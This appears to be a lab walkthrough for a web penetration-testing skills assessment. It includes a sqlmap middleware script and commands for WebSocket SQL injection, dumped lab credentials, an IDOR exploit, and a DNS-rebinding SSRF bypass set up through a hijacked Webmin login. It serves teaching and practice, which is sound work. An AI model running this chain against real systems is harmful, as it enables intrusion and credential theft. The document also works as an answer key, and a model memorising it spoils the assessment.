Skills Assessment

Scenario

Inlanefreight has contacted us to conduct an external penetration test against their web applications. They are launching a groundbreaking PDF creator.

In-Scope Subdomains

Target	Local Port
library.inlanefreight.local	8001
vault.inlanefreight.local	8002
pdf.inlanefreight.local	8003
webmin.inlanefreight.local	10000

Note: Certain web applications only function properly with the corresponding local port value.

Setup /etc/hosts

sudo tee -a /etc/hosts > /dev/null <<EOT
## inlanefreight hosts 
<Target_IP> library.inlanefreight.local vault.inlanefreight.local webmin.inlanefreight.local pdf.inlanefreight.local
EOT

---

Question 1: Library Web Application Flag

Vulnerability: WebSocket SQLi

1. Navigate to library.inlanefreight.local:8001

2. Search for user messages → Notice WebSocket connections in Burp

3. Username sent via JSON to /dbconnector endpoint

Exploitation

Create sqlmap middleware:

from flask import Flask, request
from websocket import create_connection
import json

app = Flask(__name__)
WS_URL = 'ws://library.inlanefreight.local:8001/dbconnector'

@app.route('/')
def index():
    req = {}
    req['username'] = request.args.get('username', '')
    ws = create_connection(WS_URL)
    ws.send(json.dumps(req))
    r = json.loads(ws.recv())
    ws.close()
    if r.get('error'):
        return r['error']
    return r['messages']

app.run(host='127.0.0.1', port=8000)

Run middleware:

python3 sqlmapMiddleware.py

Confirm SQLi:

sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' --batch --threads=10

Enumerate databases:

sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' --dbs --threads=10

Enumerate tables:

sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' --tables -D db --threads=10

Dump flag:

sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' -T flag --dump --threads=10

---

Question 2: htb-stdnt Password

Exploitation

Using same middleware, dump users table:

sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' -T users --dump --threads=10

Result:

+----+---------------------+--------------------+-----------+
| id | message             | password           | username  |
+----+---------------------+--------------------+-----------+
| 1  | Administrator User  | admin              | admin     |
| 2  |  HTB Staff User     | HTB_@cad3my_Stdnt! | htb-stdnt |
+----+---------------------+--------------------+-----------+

Credentials: htb-stdnt:HTB_@cad3my_Stdnt!

---

Question 3: Vault Admin Password

Vulnerability: Second-Order IDOR

1. Navigate to vault.inlanefreight.local:8002

2. Login with htb-stdnt:HTB_@cad3my_Stdnt!

3. Hover over "My Vault" → Notice URL parameter id

Exploitation

1. Intercept request to view vault

2. Change id value to 1 (admin's vault)

3. Don't follow redirect

4. Refresh /display_data.php directly

Result: Admin's Webmin password: AdM1N@v@uL1

---

Question 4: PDF Application Flag

Vulnerability: DNS Rebinding SSRF Bypass

The PDF app at pdf.inlanefreight.local:8003 has SSRF filters blocking private IPs.

Step 1: Access Webmin

Login to webmin.inlanefreight.local:10000 with admin:AdM1N@v@uL1

Step 2: Change DNS Settings

Navigate to: Networking → Network Configuration → Hostname and DNS Client

Set DNS server to your tun0 IP:

ip -o -4 a show tun0 | cut -d " " -f 7

Step 3: Setup DNSrebinder

git clone https://github.com/mogwailabs/DNSrebinder.git
cd DNSrebinder/
python3 -m venv DNSrebinder
source DNSrebinder/bin/activate
pip3 install -r requirements.txt

Start rogue DNS server:

sudo python3 dnsrebinder.py --domain google.com --ip 1.1.1.1 --rebind 127.0.0.1 --counter 1 --tcp --udp

Step 4: Exploit

Visit pdf.inlanefreight.local:8003 and request:

http://google.com:8003/flag

DNS Rebinding Flow:

1. First resolution: google.com → 1.1.1.1 (passes SSRF filter)

2. Second resolution: google.com → 127.0.0.1 (bypasses to localhost)

Result: Flag displayed in generated PDF!

---

Attack Chain Summary

┌─────────────────────────────────────────────────────────────────────────┐
│                    Skills Assessment Attack Flow                        │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                         │
│  1. Library (WebSocket SQLi)                                           │
│     └── sqlmap middleware → dump flag table → get credentials          │
│                                                                         │
│  2. Vault (Second-Order IDOR)                                          │
│     └── Login with htb-stdnt creds                                     │
│     └── Change id=1, don't follow redirect → admin Webmin password     │
│                                                                         │
│  3. Webmin (DNS Configuration)                                         │
│     └── Login with admin creds                                         │
│     └── Point DNS to attacker's rogue DNS server                       │
│                                                                         │
│  4. PDF (DNS Rebinding)                                                │
│     └── DNSrebinder: 1.1.1.1 → 127.0.0.1                               │
│     └── Request http://google.com:8003/flag → bypass SSRF → get flag   │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘